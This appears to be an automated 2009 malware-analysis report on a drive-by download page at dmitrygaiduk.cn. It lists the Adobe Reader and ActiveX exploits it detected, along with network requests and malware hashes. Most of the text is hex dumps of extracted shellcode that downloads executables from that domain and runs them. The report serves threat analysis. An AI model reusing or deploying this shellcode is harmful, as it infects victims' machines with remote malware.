Analysis report for http://dmitrygaiduk.cn/show.php?s=1893da9ce4

Sample Overview

URLhttp://dmitrygaiduk.cn/show.php?s=1893da9ce4
MD57049447b1560e567bb3965572ae17556
Analysis Started2009-09-10 04:48:35
Report Generated2009-09-10 04:48:58
Jsand version1.03.02

See the report for domain dmitrygaiduk.cn.

Detection results

DetectorResult
Jsand 1.03.02malicious

Exploits

NameDescriptionReference
Office Snapshot ViewerThe Microsoft Office Snapshot Viewer ActiveX control allows remote attackers to download arbitrary files to a client machineCVE-2008-2463
Adobe Collab overflowMultiple Adobe Reader and Acrobat buffer overflowsCVE-2007-5659
Adobe util.printf overflowStack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printfCVE-2008-2992
Adobe getIconStack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab objectCVE-2009-0927
MsVidCtl OverflowOverflow in Microsoft Video ActiveX Control via specially-crafted data parameterCVE-2008-0015

Deobfuscation results

Evals

Writes

No writes.

Network Activity

Requests

URLStatusContent Type
http://dmitrygaiduk.cn/show.php?s=1893da9ce4200text/html
about:blank200text/html
http://dmitrygaiduk.cn/adhlorvy.pdf200application/pdf
http://lib.ru/WEBMASTER/robots.txt200text/html

Redirects

No redirects.

ActiveX controls

Shellcode and Malware

HexadecimalASCII
33 c0 64 8b 40 30 78 0c  8b 40 0c 8b 70 1c ad 8b 
58 08 eb 09 8b 40 34 8d  40 7c 8b 58 3c 6a 44 5a 
d1 e2 2b e2 8b ec eb 4f  5a 52 83 ea 56 89 55 04 
56 57 8b 73 3c 8b 74 33  78 03 f3 56 8b 76 20 03 
f3 33 c9 49 50 41 ad 33  ff 36 0f be 14 03 38 f2 
74 08 c1 cf 0d 03 fa 40  eb ef 58 3b f8 75 e5 5e 
8b 46 24 03 c3 66 8b 0c  48 8b 56 1c 03 d3 8b 04 
8a 03 c3 5f 5e 50 c3 8d  7d 08 57 52 b8 33 ca 8a 
5b e8 a2 ff ff ff 32 c0  8b f7 f2 ae 4f b8 65 2e 
65 78 ab 66 98 66 ab 33  c0 b8 61 64 00 00 50 68 
54 68 72 65 35 24 1c 69  74 50 54 53 b8 aa fc 0d 
7c ff 55 04 8b f8 83 c4  0c b0 6c 8a e0 98 50 68 
6f 6e 2e 64 68 75 72 6c  6d 54 b8 8e 4e 0e ec ff 
55 04 93 50 33 c0 50 50  56 8b 55 04 83 c2 7f 83 
c2 4c 52 50 b8 36 1a 2f  70 ff 55 04 5b 57 56 b8 
98 fe 8a 0e ff 55 04 6a  00 ff d7 68 74 74 70 3a 
2f 2f 64 6d 69 74 72 79  67 61 69 64 75 6b 2e 63 
6e 2f 62 67 6a 6d 70 71  79 32 2e 65 78 65 00 00 
3.d.@0x..@..p...
X....@4.@|.X<jDZ
..+....OZR..V.U.
VW.s<.t3x..V.v .
.3.IPA.3.6....8.
t......@..X;.u.^
.F$..f..H.V.....
..._^P..}.WR.3..
[.....2.....O.e.
ex.f.f.3..ad..Ph
Thre5$.itPTS....
|.U.......l...Ph
on.dhurlmT..N...
U..P3.PPV.U.....
.LRP.6./p.U.[WV.
.....U.j...http:
//dmitrygaiduk.c
n/bgjmpqy2.exe..
90 64 a1 18 00 00 00 8b  40 30 8b 40 54 8b 40 04 
8b 40 04 8b 40 04 0d 20  00 20 00 3d 7c 00 77 00 
74 01 c3 33 c0 64 8b 40  30 78 0c 8b 40 0c 8b 70 
1c ad 8b 58 08 eb 09 8b  40 34 8d 40 7c 8b 58 3c 
6a 44 5a d1 e2 2b e2 8b  ec eb 4f 5a 52 83 ea 56 
89 55 04 56 57 8b 73 3c  8b 74 33 78 03 f3 56 8b 
76 20 03 f3 33 c9 49 50  41 ad 33 ff 36 0f be 14 
03 38 f2 74 08 c1 cf 0d  03 fa 40 eb ef 58 3b f8 
75 e5 5e 8b 46 24 03 c3  66 8b 0c 48 8b 56 1c 03 
d3 8b 04 8a 03 c3 5f 5e  50 c3 8d 7d 08 57 52 b8 
33 ca 8a 5b e8 a2 ff ff  ff 32 c0 8b f7 f2 ae 4f 
b8 75 2e 65 78 ab 66 98  66 ab 33 c0 b8 61 64 00 
00 50 68 54 68 72 65 35  24 1c 69 74 50 54 53 b8 
aa fc 0d 7c ff 55 04 8b  f8 83 c4 0c b0 6c 8a e0 
98 50 68 6f 6e 2e 64 68  75 72 6c 6d 54 b8 8e 4e 
0e ec ff 55 04 93 50 33  c0 50 50 56 8b 55 04 83 
c2 7f 83 c2 4c 52 50 b8  36 1a 2f 70 ff 55 04 5b 
57 56 b8 98 fe 8a 0e ff  55 04 6a 00 ff d7 68 74 
74 70 3a 2f 2f 64 6d 69  74 72 79 67 61 69 64 75 
6b 2e 63 6e 2f 64 66 68  6a 6e 77 78 33 2e 65 78 
65 00 
.d......@0.@T.@.
.@..@.. . .=|.w.
t..3.d.@0x..@..p
...X....@4.@|.X<
jDZ..+....OZR..V
.U.VW.s<.t3x..V.
v ..3.IPA.3.6...
.8.t......@..X;.
u.^.F$..f..H.V..
......_^P..}.WR.
3..[.....2.....O
.u.ex.f.f.3..ad.
.PhThre5$.itPTS.
...|.U.......l..
.Phon.dhurlmT..N
...U..P3.PPV.U..
....LRP.6./p.U.[
WV......U.j...ht
tp://dmitrygaidu
k.cn/dfhjnwx3.ex
e.
90 64 a1 18 00 00 00 8b  40 30 8b 40 54 8b 40 04 
8b 40 04 8b 40 04 0d 20  00 20 00 3d 7c 00 77 00 
74 01 c3 33 c0 64 8b 40  30 78 0c 8b 40 0c 8b 70 
1c ad 8b 58 08 eb 09 8b  40 34 8d 40 7c 8b 58 3c 
6a 44 5a d1 e2 2b e2 8b  ec eb 4f 5a 52 83 ea 56 
89 55 04 56 57 8b 73 3c  8b 74 33 78 03 f3 56 8b 
76 20 03 f3 33 c9 49 50  41 ad 33 ff 36 0f be 14 
03 38 f2 74 08 c1 cf 0d  03 fa 40 eb ef 58 3b f8 
75 e5 5e 8b 46 24 03 c3  66 8b 0c 48 8b 56 1c 03 
d3 8b 04 8a 03 c3 5f 5e  50 c3 8d 7d 08 57 52 b8 
33 ca 8a 5b e8 a2 ff ff  ff 32 c0 8b f7 f2 ae 4f 
b8 75 2e 65 78 ab 66 98  66 ab 33 c0 b8 61 64 00 
00 50 68 54 68 72 65 35  24 1c 69 74 50 54 53 b8 
aa fc 0d 7c ff 55 04 8b  f8 83 c4 0c b0 6c 8a e0 
98 50 68 6f 6e 2e 64 68  75 72 6c 6d 54 b8 8e 4e 
0e ec ff 55 04 93 50 33  c0 50 50 56 8b 55 04 83 
c2 7f 83 c2 4c 52 50 b8  36 1a 2f 70 ff 55 04 5b 
57 56 b8 98 fe 8a 0e ff  55 04 6a 00 ff d7 68 74 
74 70 3a 2f 2f 64 6d 69  74 72 79 67 61 69 64 75 
6b 2e 63 6e 2f 64 6b 6d  70 73 33 2e 65 78 65 00 
.d......@0.@T.@.
.@..@.. . .=|.w.
t..3.d.@0x..@..p
...X....@4.@|.X<
jDZ..+....OZR..V
.U.VW.s<.t3x..V.
v ..3.IPA.3.6...
.8.t......@..X;.
u.^.F$..f..H.V..
......_^P..}.WR.
3..[.....2.....O
.u.ex.f.f.3..ad.
.PhThre5$.itPTS.
...|.U.......l..
.Phon.dhurlmT..N
...U..P3.PPV.U..
....LRP.6./p.U.[
WV......U.j...ht
tp://dmitrygaidu
k.cn/dkmps3.exe.
90 64 a1 18 00 00 00 8b  40 30 8b 40 54 8b 40 04 
8b 40 04 8b 40 04 0d 20  00 20 00 3d 7c 00 77 00 
74 01 c3 33 c0 64 8b 40  30 78 0c 8b 40 0c 8b 70 
1c ad 8b 58 08 eb 09 8b  40 34 8d 40 7c 8b 58 3c 
6a 44 5a d1 e2 2b e2 8b  ec eb 4f 5a 52 83 ea 56 
89 55 04 56 57 8b 73 3c  8b 74 33 78 03 f3 56 8b 
76 20 03 f3 33 c9 49 50  41 ad 33 ff 36 0f be 14 
03 38 f2 74 08 c1 cf 0d  03 fa 40 eb ef 58 3b f8 
75 e5 5e 8b 46 24 03 c3  66 8b 0c 48 8b 56 1c 03 
d3 8b 04 8a 03 c3 5f 5e  50 c3 8d 7d 08 57 52 b8 
33 ca 8a 5b e8 a2 ff ff  ff 32 c0 8b f7 f2 ae 4f 
b8 75 2e 65 78 ab 66 98  66 ab 33 c0 b8 61 64 00 
00 50 68 54 68 72 65 35  24 1c 69 74 50 54 53 b8 
aa fc 0d 7c ff 55 04 8b  f8 83 c4 0c b0 6c 8a e0 
98 50 68 6f 6e 2e 64 68  75 72 6c 6d 54 b8 8e 4e 
0e ec ff 55 04 93 50 33  c0 50 50 56 8b 55 04 83 
c2 7f 83 c2 4c 52 50 b8  36 1a 2f 70 ff 55 04 5b 
57 56 b8 98 fe 8a 0e ff  55 04 6a 00 ff d7 68 74 
74 70 3a 2f 2f 64 6d 69  74 72 79 67 61 69 64 75 
6b 2e 63 6e 2f 68 6f 73  75 76 77 78 7a 33 2e 65 
78 65 00 00 
.d......@0.@T.@.
.@..@.. . .=|.w.
t..3.d.@0x..@..p
...X....@4.@|.X<
jDZ..+....OZR..V
.U.VW.s<.t3x..V.
v ..3.IPA.3.6...
.8.t......@..X;.
u.^.F$..f..H.V..
......_^P..}.WR.
3..[.....2.....O
.u.ex.f.f.3..ad.
.PhThre5$.itPTS.
...|.U.......l..
.Phon.dhurlmT..N
...U..P3.PPV.U..
....LRP.6./p.U.[
WV......U.j...ht
tp://dmitrygaidu
k.cn/hosuvwxz3.e
xe..
90 64 a1 18 00 00 00 8b  40 30 8b 40 54 8b 40 04 
8b 40 04 8b 40 04 0d 20  00 20 00 3d 7c 00 77 00 
74 01 c3 33 c0 64 8b 40  30 78 0c 8b 40 0c 8b 70 
1c ad 8b 58 08 eb 09 8b  40 34 8d 40 7c 8b 58 3c 
6a 44 5a d1 e2 2b e2 8b  ec eb 4f 5a 52 83 ea 56 
89 55 04 56 57 8b 73 3c  8b 74 33 78 03 f3 56 8b 
76 20 03 f3 33 c9 49 50  41 ad 33 ff 36 0f be 14 
03 38 f2 74 08 c1 cf 0d  03 fa 40 eb ef 58 3b f8 
75 e5 5e 8b 46 24 03 c3  66 8b 0c 48 8b 56 1c 03 
d3 8b 04 8a 03 c3 5f 5e  50 c3 8d 7d 08 57 52 b8 
33 ca 8a 5b e8 a2 ff ff  ff 32 c0 8b f7 f2 ae 4f 
b8 75 2e 65 78 ab 66 98  66 ab 33 c0 b8 61 64 00 
00 50 68 54 68 72 65 35  24 1c 69 74 50 54 53 b8 
aa fc 0d 7c ff 55 04 8b  f8 83 c4 0c b0 6c 8a e0 
98 50 68 6f 6e 2e 64 68  75 72 6c 6d 54 b8 8e 4e 
0e ec ff 55 04 93 50 33  c0 50 50 56 8b 55 04 83 
c2 7f 83 c2 4c 52 50 b8  36 1a 2f 70 ff 55 04 5b 
57 56 b8 98 fe 8a 0e ff  55 04 6a 00 ff d7 68 74 
74 70 3a 2f 2f 64 6d 69  74 72 79 67 61 69 64 75 
6b 2e 63 6e 2f 69 6c 6d  72 79 33 2e 65 78 65 00 
.d......@0.@T.@.
.@..@.. . .=|.w.
t..3.d.@0x..@..p
...X....@4.@|.X<
jDZ..+....OZR..V
.U.VW.s<.t3x..V.
v ..3.IPA.3.6...
.8.t......@..X;.
u.^.F$..f..H.V..
......_^P..}.WR.
3..[.....2.....O
.u.ex.f.f.3..ad.
.PhThre5$.itPTS.
...|.U.......l..
.Phon.dhurlmT..N
...U..P3.PPV.U..
....LRP.6./p.U.[
WV......U.j...ht
tp://dmitrygaidu
k.cn/ilmry3.exe.
0a 0a 0a 0a 0a 0a 0a 0a  90 64 a1 18 00 00 00 8b 
40 30 8b 40 54 8b 40 04  8b 40 04 8b 40 04 0d 20 
00 20 00 3d 7c 00 77 00  74 01 c3 33 c0 64 8b 40 
30 78 0c 8b 40 0c 8b 70  1c ad 8b 58 08 eb 09 8b 
40 34 8d 40 7c 8b 58 3c  6a 44 5a d1 e2 2b e2 8b 
ec eb 4f 5a 52 83 ea 56  89 55 04 56 57 8b 73 3c 
8b 74 33 78 03 f3 56 8b  76 20 03 f3 33 c9 49 50 
41 ad 33 ff 36 0f be 14  03 38 f2 74 08 c1 cf 0d 
03 fa 40 eb ef 58 3b f8  75 e5 5e 8b 46 24 03 c3 
66 8b 0c 48 8b 56 1c 03  d3 8b 04 8a 03 c3 5f 5e 
50 c3 8d 7d 08 57 52 b8  33 ca 8a 5b e8 a2 ff ff 
ff 32 c0 8b f7 f2 ae 4f  b8 75 2e 65 78 ab 66 98 
66 ab 33 c0 b8 61 64 00  00 50 68 54 68 72 65 35 
24 1c 69 74 50 54 53 b8  aa fc 0d 7c ff 55 04 8b 
f8 83 c4 0c b0 6c 8a e0  98 50 68 6f 6e 2e 64 68 
75 72 6c 6d 54 b8 8e 4e  0e ec ff 55 04 93 50 33 
c0 50 50 56 8b 55 04 83  c2 7f 83 c2 4c 52 50 b8 
36 1a 2f 70 ff 55 04 5b  57 56 b8 98 fe 8a 0e ff 
55 04 6a 00 ff d7 68 74  74 70 3a 2f 2f 64 6d 69 
74 72 79 67 61 69 64 75  6b 2e 63 6e 2f 63 66 6b 
75 33 2e 65 78 65 00 00  
.........d......
@0.@T.@..@..@.. 
. .=|.w.t..3.d.@
0x..@..p...X....
@4.@|.X<jDZ..+..
..OZR..V.U.VW.s<
.t3x..V.v ..3.IP
A.3.6....8.t....
..@..X;.u.^.F$..
f..H.V........_^
P..}.WR.3..[....
.2.....O.u.ex.f.
f.3..ad..PhThre5
$.itPTS....|.U..
.....l...Phon.dh
urlmT..N...U..P3
.PPV.U......LRP.
6./p.U.[WV......
U.j...http://dmi
trygaiduk.cn/cfk
u3.exe..
0a 0a 0a 0a 0a 0a 0a 0a  90 64 a1 18 00 00 00 8b 
40 30 8b 40 54 8b 40 04  8b 40 04 8b 40 04 0d 20 
00 20 00 3d 7c 00 77 00  74 01 c3 33 c0 64 8b 40 
30 78 0c 8b 40 0c 8b 70  1c ad 8b 58 08 eb 09 8b 
40 34 8d 40 7c 8b 58 3c  6a 44 5a d1 e2 2b e2 8b 
ec eb 4f 5a 52 83 ea 56  89 55 04 56 57 8b 73 3c 
8b 74 33 78 03 f3 56 8b  76 20 03 f3 33 c9 49 50 
41 ad 33 ff 36 0f be 14  03 38 f2 74 08 c1 cf 0d 
03 fa 40 eb ef 58 3b f8  75 e5 5e 8b 46 24 03 c3 
66 8b 0c 48 8b 56 1c 03  d3 8b 04 8a 03 c3 5f 5e 
50 c3 8d 7d 08 57 52 b8  33 ca 8a 5b e8 a2 ff ff 
ff 32 c0 8b f7 f2 ae 4f  b8 75 2e 65 78 ab 66 98 
66 ab 33 c0 b8 61 64 00  00 50 68 54 68 72 65 35 
24 1c 69 74 50 54 53 b8  aa fc 0d 7c ff 55 04 8b 
f8 83 c4 0c b0 6c 8a e0  98 50 68 6f 6e 2e 64 68 
75 72 6c 6d 54 b8 8e 4e  0e ec ff 55 04 93 50 33 
c0 50 50 56 8b 55 04 83  c2 7f 83 c2 4c 52 50 b8 
36 1a 2f 70 ff 55 04 5b  57 56 b8 98 fe 8a 0e ff 
55 04 6a 00 ff d7 68 74  74 70 3a 2f 2f 64 6d 69 
74 72 79 67 61 69 64 75  6b 2e 63 6e 2f 63 6a 6b 
6f 73 75 77 78 79 33 2e  65 78 65 00 
.........d......
@0.@T.@..@..@.. 
. .=|.w.t..3.d.@
0x..@..p...X....
@4.@|.X<jDZ..+..
..OZR..V.U.VW.s<
.t3x..V.v ..3.IP
A.3.6....8.t....
..@..X;.u.^.F$..
f..H.V........_^
P..}.WR.3..[....
.2.....O.u.ex.f.
f.3..ad..PhThre5
$.itPTS....|.U..
.....l...Phon.dh
urlmT..N...U..P3
.PPV.U......LRP.
6./p.U.[WV......
U.j...http://dmi
trygaiduk.cn/cjk
osuwxy3.exe.

Additional (potential) malware:

URLTypeHashAnalysis
http://dmitrygaiduk.cn/bcluwy5.exe MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit e2bc8e1daae2bcb570a2631fde774d45
http://dmitrygaiduk.cn/bgjmpqy2.exe MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit e2bc8e1daae2bcb570a2631fde774d45
http://dmitrygaiduk.cn/cfku3.exe MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit e2bc8e1daae2bcb570a2631fde774d45
http://dmitrygaiduk.cn/cjkosuwxy3.exe MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit e2bc8e1daae2bcb570a2631fde774d45
http://dmitrygaiduk.cn/dfhjnwx3.exe MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit e2bc8e1daae2bcb570a2631fde774d45
http://dmitrygaiduk.cn/dkmps3.exe MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit e2bc8e1daae2bcb570a2631fde774d45
http://dmitrygaiduk.cn/hosuvwxz3.exe MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit e2bc8e1daae2bcb570a2631fde774d45
http://dmitrygaiduk.cn/ilmry3.exe MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit e2bc8e1daae2bcb570a2631fde774d45